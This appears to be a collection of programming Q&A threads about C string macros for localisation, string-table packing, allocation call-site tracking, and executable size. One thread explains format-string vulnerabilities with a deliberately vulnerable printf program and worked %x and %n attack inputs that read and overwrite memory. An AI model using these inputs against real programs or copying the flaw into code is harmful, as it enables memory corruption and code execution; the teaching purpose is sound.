I have a C program, written for an embedded device, whose user-facing strings are in English.
So there is code like:
SomeMethod("Please select menu");
OtherMethod("Choice 1");
Say I want to support other languages, but I don't know how much memory the device has. I don't want to store the strings in a different memory area where I might have less space and crash the program; I want the strings to live in the same memory area and take the same space. So I thought of this:
SomeMethod(SELECT_MENU);
OtherMethod(CHOICE_1);
And a separate header file:
English.h
#define SELECT_MENU "Please select menu"
#define CHOICE_1 "Choice 1"
For other languages:
French.h
#define SELECT_MENU "Text in french"
#define CHOICE_1 "same here"
Now, depending on which language I want, I would include only that header file.
Does this satisfy the requirement that, if I select the English version, my internationalized program's strings will be stored in the same memory region and take the same space as before? (I know French might take more, but that is a separate issue, since French letters can take more bytes.)
I thought that since I will use defines, the strings will be placed in the same place in memory as they were before.
At least on Linux and many other POSIX systems, you should be interested in gettext(3) (and in the positional arguments to printf(3), e.g. %3$d instead of %d in the format string).
Then you'll code
printf(gettext("here x is %d and y is %d"), x, y);
and that is common enough that it is customary to
#define _(X) gettext(X)
and then write
printf(_("here x is %d and y is %d"), x, y);
You'll also want to process message catalogs with msgfmt(1).
You'll find several documents on internationalization (i18n) and localization, e.g. Debian Introduction to i18n. Read also locale(7). And you probably should always use UTF-8 today.
The advantage of such message catalogs (all of this is available by default on Linux systems!) is that the internationalization happens at runtime; there is no reason to restrict it to compile time. Message catalogs can be (and often are) translated by people other than the developers. You'll have directories in your file system (e.g. on some cheap flash memory, like an SD card) containing these.
Notice that internationalization & localization is a difficult subject (read more documentation to understand just how difficult it can get once you want to handle non-European languages), and the Linux infrastructure has designed it quite well (probably better, and more efficiently, than what you are suggesting with your macros). Qt and Gtk also have extensive support for internationalization (based on gettext etc.).
Let me get this straight: you want to know whether, if preprocessor-defined constants (in your case, related to i18n) are substituted before compilation, they would (a) take the same amount of memory (between the macro and non-macro versions) and (b) be stored in the same program segment?
The short answer is (a) yes and (b) yes-ish.
For the first part, this is easy. Preprocessor-defined constants are replaced wholesale with their #define'd values by the preprocessor before the result is passed to the compiler. So, to the compiler,
#define SELECT_MENU "Please select menu"
// ...
SomeMethod(SELECT_MENU);
is read in as
SomeMethod("Please select menu");
and therefore will be identical for all intents and purposes except for how it appears to the programmer.
For the second part, this is a bit more complex. Constant string literals in a C program are placed in the program's (typically read-only) data segment. If a literal is declared as the initial contents of a char array, its contents are instead copied into that array at runtime, so the array lives on the stack (or wherever it is allocated) and the initialization code adds to the code segment. Which of these happens depends on how the preprocessor-defined constant is used in the program.
Considering what I said in the first part: if you have char buffer[] = MY_CONSTANT;, the compiler emits initialization code where it is used, which grows the code segment, and the array itself occupies stack space at runtime. If you have someFunction(MY_CONSTANT); or char *c_str = MY_CONSTANT;, then the literal will likely live in the data segment, and you receive a pointer to that area at runtime. There are many ways this can manifest in your actual program; #define'ing the strings does not by itself determine how they will be stored in the compiled program, although if they are used only in certain ways, you can be reasonably certain where they will end up.
EDIT: Modified the first half of the answer to address accurately what is being asked, thanks to @esm's comment.
The pre-processor use here is simple substitution: there is no difference in the executable code between
SomeMethod("Please select menu");
and
#define SELECT_MENU "Please select menu"
...
SomeMethod(SELECT_MENU);
But the memory usage is unlikely to be exactly the same for each language.
In practice, messages are often more complicated than a simple translation. For example in the message
Input #4 is dangerous
Would you have
#define DANGER "Input #%d is dangerous"
...
printf(DANGER, inpnum);
Or would you do
#define DANGER "Dangerous input #"
...
printf(DANGER);
printf("%d", inpnum);
I use these examples to show that you must consider language versions from the outset, not as an easy retrofit.
Since you mention "a device" and are concerned with memory usage, I guess you are working on an embedded system. My own preferred method is to provide language modules containing an array of words or phrases, with #defines to reference the array elements used to piece together a message. That could also be done with an enum.
For example (in practice the English-language source would be included as a separate file):
#include <stdio.h>

char *message[] = { "Input",
                    "is dangerous" };

#define M_INPUT  0
#define M_DANGER 1

int main()
{
    int input = 4;
    printf("%s #%d %s\n", message[M_INPUT], input, message[M_DANGER]);
    return 0;
}
Program output:
Input #4 is dangerous
The way you are doing it, if you compile the program as English, the French words will not be stored in the English version of the program.
The compiler will not even see the French words, so they will not be in the final executable.
In some cases, the compiler may see some data, but it chooses to ignore that data if the data is not being used in the program.
For example, consider this function:
void foo() {
cout << "qwerty\n";
}
If you define this function but never use it in the program, then the function foo and the string "qwerty" may well be omitted from the final executable (this is guaranteed only where the toolchain can prove the symbol unused, e.g. for static functions or with link-time garbage collection).
Using a macro doesn't make any difference. For example, foo above and foo2 below are identical.
#define SOME_TEXT "qwerty\n"
void foo2() {
cout << SOME_TEXT;
}
The string literals themselves are stored in the (usually read-only) data segment, not on the heap. Stack space only becomes a concern if a large literal is copied into a local array; otherwise the literals simply add to the program's size.
So basically you don't have anything to worry about except the final size of the program.
To answer the question: will the English macro version take the same amount of memory, with the strings placed in the same section of the program, as the English non-macro version? The answer to both is yes.
The C preprocessor (CPP) will replace all instances of the macro with the correct string for the given language, and after the CPP run it will be as if the macros were never there. The strings will still be placed in the read-only data section of the binary (assuming that is supported), just as if you hadn't used macros.
So, to summarize: the English version with macros and the English version without macros are the same as far as the C compiler is concerned, see link.
Related
Introduction
I am running out of Flash on my Cortex-M4 device. I analysed the code, and the biggest opportunity to reduce code size is simply in predefined constants.
- Example
const Struct option364[] = {
    { "String1",  0x4523, "String2" },
    { "Str3",     0x1123, "S4" },
    { "String 5", 0xAAFC, "S6" }
};
Problem
The problem is that I have a (large) number of (short) strings to store, but most of them are used in tables - arrays of const structs that have pointers to the const strings mixed with the numerical data. Each string is variable in size; however, I still looked at changing the struct pointer to hold a simple (max-size) char array instead of a pointer, and there wasn't much difference. It didn't help that the compiler wanted to start each new string on a 4-byte boundary; which got me thinking...
Idea
If I could replace the 4-byte char pointer with a 2-byte index into a string table - a predefined linker section to which index was an offset - I would save 2 bytes per record right there, at the expense of a minor code bump. I'd also avoid the interior padding, since each string could start immediately after the previous string's NUL byte. And if I could be clever, I could re-use strings - or even part-strings - for the indexes.
But moreover, I'd change the 4 + 2 + 4 (+ 2) alignment to 2 + 2 + 2 - saving even more space!
- Consideration
Of course, inside the source code the housekeeping on all those strings, and the string table itself, would be a nightmare... unless I could get the compiler to help? I thought of changing the syntax of the actual source code: if I wanted a string to be in the string table, I would write it as #"String", where the # prefix would flag it as a string table candidate. A normal string wouldn't have that prefix, and the compiler would treat it as normal.
Implementation
So to implement this I'd have to write a pre-pre-compiler: something that would process just the #"" strings, replacing them with "magic" 16-bit offsets, and then pass everything else to the real (pre)compiler for the actual compilation. The pre-pre-compiler would also have to write a new C file with the complete string table inside (although with a trick - see below), for the compiler to parse and provide to the linker for its dedicated section. Invoking this would be easy with the -no-integrated-cpp switch, to invoke my own pre-pre-processor, which would in turn invoke the real one.
- Issues
Don't get me wrong; I know there are issues. For example, it would have to be able to handle partial builds. My solution there is that for every modified C file, it would write (if necessary) a parallel string table file. The "master" C string table file would be nothing more than a series of #includes, that the build would realise needed recompiling if one of its #includes had changed - or indeed, if a new #include was added.
Result
The upshot would be an executable that would have all the (constant) strings packed into a memory blob of no larger than 64K (not a problem!). The code would know that index would be an offset into that blob, so would add the index to the start of the string table pointer before using it as normal.
Question
My question is: is it worth it?
- Pros:
It would save a tonne of space. I didn't quantify it above, but assume a saving of 5%(!) of total Flash.
- Cons:
It would require the build process to be modified to include a bespoke preprocessor;
That preprocessor would have to be built as part of the toolchain rather than the project;
The preprocessor could have bugs or limitations;
The real source code wouldn't compile "out of the box".
Now...
I have donned my asbestos suit, so... GO!
This kind of "project custom preprocessor" used to be fairly common back in the days when memory was pretty constrained. It's pretty easy to do if you use make as your build system -- just a custom pattern or suffix rule to run your preprocessor.
The main question is whether you want to run it on all source files or just some. If only a couple need it, you define a new file extension for source files that need preprocessing (e.g., .cx and a .cx.c: rule to run the preprocessor). If all need it, you redefine the implicit .c.o: rule.
The main drawback, as you noted, is that if there's any sort of global coordination (such as pooling all the strings like you are trying to do), changing any source file needing the preprocessor will likely require rebuilding all of them, which is potentially quite slow.
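The suffix-rule approach might look like this in a makefile (the tool name strpack and the .cx extension are hypothetical placeholders for your own preprocessor):

```make
# Hypothetical tool "strpack" rewrites #"..." strings to 16-bit offsets
# and emits plain C; .cx is the extension for sources that need it.
.SUFFIXES: .cx .c .o

.cx.c:
	strpack $< > $@

.c.o:
	$(CC) $(CFLAGS) -c -o $@ $<
```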
I wish to encode the location -- say, __FILE__/__LINE__ -- each time I do a memory allocation. That's over 3,000 call sites in my codebase, so I don't really want to hard-code it.
I have used a macro which just passes in __FILE__, __LINE__, which works great.
Now I want to store this with each allocation as well, so it needs to be compressed. I have used a minimal perfect hash for __FILE__, which makes the (__FILE__, __LINE__) pair fit within a 32-bit integer.
However, computing the MPH on each allocation is just too expensive (mostly because it loops through the string computing a primary hash first).
Since all the strings are constant, the MPH is constant and everything is constant, there should be a faster way to compute this.
Alternatively, does anyone know a better way to compute code locations so they can be looked up and stored in an efficient manner (I've looked at the boost library PP_COUNTER macro as well) ?
Thanks!
A code location is already efficiently encoded by { __FILE__, __LINE__ }.
The macro __FILE__ expands to a string literal, which (in C99, and likely earlier) is “used to initialize an array of static storage duration” and you pass in its address, which is all you need and need not be compressed. I have done it like this (optionally including the current function name), with no problems, in VMS C, AIX C and MSVS C, and it has been very helpful.
N.B.
In theory, a really poor compiler may not pool string literals, not even __FILE__, resulting in bloated object code, but that seems unlikely in the extreme!
As long as your compiler does pool string literals, you can calculate a hash on the address, if you need one.
I have seen that C++ function name macros may be function calls, so this technique may be inapplicable there.
I was reading about vulnerabilities in code and came across this Format-String Vulnerability.
Wikipedia says:
Format string bugs most commonly appear when a programmer wishes to
print a string containing user supplied data. The programmer may
mistakenly write printf(buffer) instead of printf("%s", buffer). The
first version interprets buffer as a format string, and parses any
formatting instructions it may contain. The second version simply
prints a string to the screen, as the programmer intended.
I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?
You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):
int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text);

    printf("some_value # 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return 0;
}
The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:
Reading from arbitrary memory addresses
[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.
It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:
./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value # 0x08049794 = -72 [0xffffffb8]
Writing to arbitrary memory addresses
You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:
./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value # 0x08049794 = 31 [0x0000001f]
We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:
./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value # 0x08049794 = 21 [0x00000015]
There are many possibilities and tricks to try (direct parameter access, large field widths making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on format string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.
Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The Art of Exploitation (2nd ed.) by Jon Erickson.
It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:
"%200$p"
to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).
However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.
* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.
Ah, the answer is in the article!
Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.
A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.
This is because %n causes printf to write data through a pointer it takes from the stack, which means it can write almost anywhere. All you need is for the program to later use the overwritten value (easiest if it happens to be a function pointer whose value you have just figured out how to control), and you can make it execute arbitrary code.
Take a look at the links in the article; they look interesting.
I would recommend reading this lecture note about format string vulnerability.
It describes in details what happens and how, and has some images that might help you to understand the topic.
AFAIK it's dangerous mainly because it can crash your program. All you need is to make it dereference an invalid address (practically anything with a few %s specifiers is almost guaranteed to hit one), and it becomes a simple denial-of-service (DoS) attack.
Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.
But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?
The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.
Update:
See this link for the CSRSS bug I was referring to.
Edit:
Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.
I've compiled a C file that does absolutely nothing (just a main that returns... not even a "Hello, world" gets printed), and I've compiled it with various compilers (MinGW GCC, Visual C++, Windows DDK, etc.). All of them link with the C runtime, which is standard.
But what I don't get is: When I open up the file in a hex editor (or a disassembler), why do I see that almost half of the 16 KB is just huge sections of either 0x00 bytes or 0xCC bytes? It seems rather ridiculous to me... is there any way to prevent these from occurring? And why are they there in the first place?
Thank you!
Executables in general contain a code segment and at least one data segment. I guess each of these has a standard minimum size, which may be 8 K, and unused space is filled with zeros. Note also that an EXE written in a higher-level (than assembly) language contains some extra stuff on top of the direct translation of your own code and data:
startup and termination code (in C and its successors, this handles the input arguments, calls main(), then cleans up after exiting from main())
stub code and data (e.g. Windows executables contain a small DOS program stub whose only purpose is to display the message "This program is not executable under DOS").
Still, since executables are usually supposed to do something (i.e. their code and data segments do contain useful stuff), and storage is cheap, by default no one optimizes for your case :-)
However, I believe most of the compilers have command line parameters with which you can force them to optimize for space - you may want to check the results with that setting.
Here are more details on the EXE file formats.
As it turns out, I should have been able to guess this beforehand... the answer was the debug symbols and code; those were taking up most of the space. Not compiling with /DEBUG and /PDB (which I always do by default) reduced the 13 KB down to 3 KB.